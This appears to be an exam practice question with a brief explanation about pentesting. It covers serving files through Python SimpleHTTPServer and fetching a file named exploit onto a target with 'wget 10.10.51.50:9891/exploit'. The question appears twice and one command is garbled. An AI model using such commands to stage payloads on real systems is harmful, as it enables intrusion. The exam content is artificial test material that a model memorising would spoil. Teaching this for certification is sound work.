A penetration tester ran the following command on a staging server: python `"m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A penetration tester ran the following command on a staging server: python `"m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
When a python SimpleHTTPServer is started on a specified port, in this case port 9891, it serves files over HTTP. To download a file named exploit from this server, the wget command is appropriate. The command 'wget 10.10.51.50:9891/exploit' will attempt to retrieve the file hosted at that address and port, which matches the behavior expected from a HTTP server started with SimpleHTTPServer.
https://www.redhat.com/sysadmin/simple-http-server "Another option is to use wget or curl to download the files to the remote system. wget http://<ip>:8000/filename curl http://<ip>:8000/filename "
wget 100% sure